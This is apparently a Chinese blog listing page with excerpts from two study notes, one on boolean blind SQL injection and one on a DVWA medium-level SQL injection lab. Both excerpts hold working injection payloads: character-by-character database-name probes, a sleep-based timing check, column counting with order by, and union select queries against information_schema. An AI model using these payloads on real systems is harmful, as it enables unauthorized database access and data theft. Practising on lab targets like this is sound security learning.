- 博客(2)
- 收藏
- 关注
RSS订阅原创 布尔盲注 笔记
1‘ and ascii(substr(database(),1,1))=‘100---------d--存在。1‘ and ascii(substr(database(),2,1))=‘118---------v--存在。1‘ and length(database())=‘1---------------不存在。1‘ and length (database())<’5---------------存在。if(length(database())=5 ,sleep(3),语句1)
2024-01-10 20:09:08
931
原创 sql注入 中级
Sql注入Medium实验准备:火狐浏览器打开手动代理,高级设置,about:config bp安装完成如果是字符串型:1‘ or 1=1报错:那就是数字型:1 or 1=1结论:注入类型为数字型猜测字段数为2id = 1 order by 2 id = 1 order by 3结论:字段数为2id = 1 union select 1,database()结论:查到到两个数据库名称,一个是dvwa,一个是adminid = 1 union select 1,table_name from informat
2024-01-10 20:07:47
403
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人